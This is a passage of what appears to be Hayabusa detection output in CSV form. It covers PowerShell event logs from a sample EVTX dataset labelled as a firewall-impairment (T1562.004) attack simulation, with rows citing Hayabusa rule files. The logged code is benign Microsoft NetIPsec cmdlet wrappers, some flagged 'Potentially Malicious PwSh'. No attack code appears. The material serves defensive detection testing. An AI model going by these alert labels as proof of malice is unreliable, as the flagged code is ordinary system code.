value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.776 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.776 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.776 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.777 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.785 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.785 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.786 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.786 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.787 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.787 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.788 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"]$__cmdletization_defaultValue = 